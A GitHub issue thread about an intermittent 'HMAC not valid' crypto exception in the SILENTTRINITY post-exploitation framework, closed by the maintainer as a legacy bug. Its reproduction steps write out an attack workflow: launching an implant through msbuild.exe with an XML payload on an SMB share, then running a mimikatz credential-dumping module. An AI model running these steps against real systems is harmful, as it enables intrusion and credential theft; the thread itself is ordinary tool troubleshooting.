### ISSUE TITLE
Exception HMAC not valid

### ISSUE THREAD

**Issue by UglyYellowCat** [byt3bl33d3r/SILENTTRINITY#61]
# Issue Template

## Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

* SILENTTRINITY Version: 0.1.0dev
* Operating System:Microsoft Windows [Version 6.1.7601]/.net v4.0.30319 /Kali 2019.1
* Python Version:3.7

## Expected Behavior

run module ipy/mimikatz without generating an exception

## Current Behavior

Launching the build on the Windows target system sometimes generates a 'HMAC  not valid' exception. File"/root/SILENTTRINITY/Server/core/crypto.py", line 99, in decrypt raise CryptoException("HMAC not valid")
 Sometimes it works to create the session and then running the ipy/mimikatz module creates the same exception.
Often everything works fine.

## Failure Information

After error occurs, module will not run

### Steps to Reproduce

Please provide detailed steps for reproducing the issue.

Start Silent Trinity 
		cd SILENTTRINITY/Server/
		python3.7 st.py -d
	Start http Listener	
		listeners
		use http
		start
#run the following in a command shell 	\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.88.128\SMB\msbuild.xml
#wait for the new session
	sessions 
	modules
	use ipy/mimikatz
	run all

### Failure Logs

Please include any relevant log snippets or files here. Try using: `python3.7 st.py -d` to get more information.

**Comment by byt3bl33d3r** [comment]
Closing since this was a bug in the legacy version, if you see this in the new version feel free to re-open

**Comment by UglyYellowCat** [comment]
Will check with latest version, thank you.
